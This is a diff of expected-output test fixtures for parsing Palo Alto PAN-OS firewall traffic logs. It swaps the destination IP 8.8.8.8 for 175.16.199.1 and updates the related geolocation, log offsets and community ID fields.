-        "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:12.000+01:00",
         "event.timezone": "+01:00",
@@ -781,12 +785,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 3554,
+        "log.offset": 3584,
         "network.application": "dns",
         "network.bytes": 228,
         "network.community_id": [
-            "1:/QKiNYN5LRWf/GXzKOZ5wzrtpzs=",
-            "1:KxK8ZPfaaBYRsG1EXYQq/SwloKk="
+            "1:jQzxuaMBPxuub+EEEPA50FIvbq0=",
+            "1:yu+bKGhSY0gWNU43UV1iXit1Tcs="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -803,12 +807,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "6578",
-        "panw.panos.network.nat.community_id": "1:/QKiNYN5LRWf/GXzKOZ5wzrtpzs=",
+        "panw.panos.network.nat.community_id": "1:jQzxuaMBPxuub+EEEPA50FIvbq0=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825917,
         "panw.panos.source.interface": "ethernet1/3",
@@ -824,13 +828,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 130,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -884,7 +888,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 4061,
+        "log.offset": 4101,
         "network.application": "ssl",
         "network.bytes": 104899,
         "network.community_id": [
@@ -981,7 +985,7 @@
         ],
         "fileset.name": "panos",
         "input.type": "log",
-        "log.offset": 4599,
+        "log.offset": 4639,
         "network.application": "dns",
         "network.bytes": 78,
         "network.community_id": "1:L1tNWtY4X9TZ6Yzx1yBczR0mkOU=",
@@ -1076,7 +1080,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 5104,
+        "log.offset": 5144,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -1179,7 +1183,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 5610,
+        "log.offset": 5650,
         "network.application": "google-base",
         "network.bytes": 7053,
         "network.community_id": [
@@ -1252,17 +1256,18 @@
         "client.nat.port": 8799,
         "client.packets": 1,
         "client.port": 44670,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 129,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1276,7 +1281,7 @@
         "event.end": "2020-03-27T09:57:07.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:07.000+01:00",
         "event.timezone": "+01:00",
@@ -1288,12 +1293,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 6157,
+        "log.offset": 6197,
         "network.application": "dns",
         "network.bytes": 226,
         "network.community_id": [
-            "1:fQ9CdNkui7fy1kmGg3+Q8GoVDj0=",
-            "1:rjZLUyzi918RXeJx7TcYqv9rtTA="
+            "1:mMi6WFHb8TB1RQ3ARBbPWKQXvFI=",
+            "1:wRQjQWlUEXgAOAXNTZ26wJ+I5rs="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -1310,12 +1315,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "57688",
-        "panw.panos.network.nat.community_id": "1:fQ9CdNkui7fy1kmGg3+Q8GoVDj0=",
+        "panw.panos.network.nat.community_id": "1:wRQjQWlUEXgAOAXNTZ26wJ+I5rs=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825899,
         "panw.panos.source.interface": "ethernet1/3",
@@ -1331,13 +1336,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 129,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1391,7 +1396,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 6664,
+        "log.offset": 6714,
         "network.application": "ssl",
         "network.bytes": 905,
         "network.community_id": [
@@ -1493,7 +1498,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 7167,
+        "log.offset": 7217,
         "network.application": "ssl",
         "network.bytes": 839,
         "network.community_id": [
@@ -1595,7 +1600,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 7671,
+        "log.offset": 7721,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -1668,17 +1673,18 @@
         "client.nat.port": 40301,
         "client.packets": 1,
         "client.port": 42451,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1692,7 +1698,7 @@
         "event.end": "2020-03-27T09:57:07.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:07.000+01:00",
         "event.timezone": "+01:00",
@@ -1704,12 +1710,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 8171,
+        "log.offset": 8221,
         "network.application": "dns",
         "network.bytes": 228,
         "network.community_id": [
-            "1:AsZoaA1egxEkeLWNuaLsth3c1D4=",
-            "1:fazjDjHWA1VTTbFV+P/qh4KzL38="
+            "1:D2AbZBM3a4fe+hl0rapK3Ftvkz0=",
+            "1:rr7uPXF0/vBL8BMWVbygmK8/OZw="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -1726,12 +1732,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "62291",
-        "panw.panos.network.nat.community_id": "1:fazjDjHWA1VTTbFV+P/qh4KzL38=",
+        "panw.panos.network.nat.community_id": "1:D2AbZBM3a4fe+hl0rapK3Ftvkz0=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825900,
         "panw.panos.source.interface": "ethernet1/3",
@@ -1747,13 +1753,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 130,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1778,17 +1784,18 @@
         "client.nat.port": 26532,
         "client.packets": 1,
         "client.port": 49896,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -1802,7 +1809,7 @@
         "event.end": "2020-03-27T09:57:37.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:37.000+01:00",
         "event.timezone": "+01:00",
@@ -1814,12 +1821,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 8679,
+        "log.offset": 8739,
         "network.application": "dns",
         "network.bytes": 97,
         "network.community_id": [
-            "1:GDOk7pO/jZK+JyTDzy1NqvVqOIg=",
-            "1:J+/8ysWuhaQSrvytWp5VX6HVI54="
+            "1:Xi4r7FyHRYN16DOZwoONkQRY4wM=",
+            "1:yHC1ROehyCrFS9sQ7OnreJRygT4="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -1836,12 +1843,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7754",
-        "panw.panos.network.nat.community_id": "1:J+/8ysWuhaQSrvytWp5VX6HVI54=",
+        "panw.panos.network.nat.community_id": "1:Xi4r7FyHRYN16DOZwoONkQRY4wM=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825904,
         "panw.panos.source.interface": "ethernet1/3",
@@ -1857,13 +1864,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -1888,17 +1895,18 @@
         "client.nat.port": 35535,
         "client.packets": 1,
         "client.port": 40588,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -1912,7 +1920,7 @@
         "event.end": "2020-03-27T09:57:37.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:37.000+01:00",
         "event.timezone": "+01:00",
@@ -1924,12 +1932,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 9180,
+        "log.offset": 9250,
         "network.application": "dns",
         "network.bytes": 98,
         "network.community_id": [
-            "1:IdNgziYzUkYe11urTk+eBYrKBE0=",
-            "1:kKp5J6TDKwzYZeDdlhTQBSa/dBs="
+            "1:StDFltYPKrirY65Q8/Xg3s4uH4w=",
+            "1:rtVuhed64FEI6y/7w5Zm107EJSk="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -1946,12 +1954,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7885",
-        "panw.panos.network.nat.community_id": "1:kKp5J6TDKwzYZeDdlhTQBSa/dBs=",
+        "panw.panos.network.nat.community_id": "1:rtVuhed64FEI6y/7w5Zm107EJSk=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825909,
         "panw.panos.source.interface": "ethernet1/3",
@@ -1967,13 +1975,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -1999,14 +2007,7 @@
         "client.packets": 3,
         "client.port": 59655,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 66,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -2034,7 +2035,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 9681,
+        "log.offset": 9761,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -2109,14 +2110,7 @@
         "client.packets": 6,
         "client.port": 59655,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 4146,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -2145,7 +2139,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 10201,
+        "log.offset": 10281,
         "network.application": "web-browsing",
         "network.bytes": 5451,
         "network.community_id": [
@@ -2220,14 +2214,7 @@
         "client.packets": 6,
         "client.port": 59655,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 4146,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -2256,7 +2243,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 10736,
+        "log.offset": 10816,
         "network.application": "google-base",
         "network.bytes": 5451,
         "network.community_id": [
@@ -2359,7 +2346,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 11281,
+        "log.offset": 11361,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -2461,7 +2448,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 11780,
+        "log.offset": 11860,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -2563,7 +2550,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 12286,
+        "log.offset": 12366,
         "network.application": "ssl",
         "network.bytes": 112771,
         "network.community_id": [
@@ -2666,7 +2653,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 12825,
+        "log.offset": 12905,
         "network.application": "google-base",
         "network.bytes": 7130,
         "network.community_id": [
@@ -2740,14 +2727,7 @@
         "client.packets": 6,
         "client.port": 59654,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 4147,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -2776,7 +2756,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 13371,
+        "log.offset": 13451,
         "network.application": "web-browsing",
         "network.bytes": 5409,
         "network.community_id": [
@@ -2851,14 +2831,7 @@
         "client.packets": 3,
         "client.port": 59654,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 66,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -2886,7 +2859,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 13906,
+        "log.offset": 13986,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -2961,14 +2934,7 @@
         "client.packets": 6,
         "client.port": 59654,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 4147,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -2997,7 +2963,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 14426,
+        "log.offset": 14506,
         "network.application": "google-base",
         "network.bytes": 5409,
         "network.community_id": [
@@ -3071,17 +3037,18 @@
         "client.nat.port": 14789,
         "client.packets": 1,
         "client.port": 46872,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 125,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -3095,7 +3062,7 @@
         "event.end": "2020-03-27T09:57:03.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
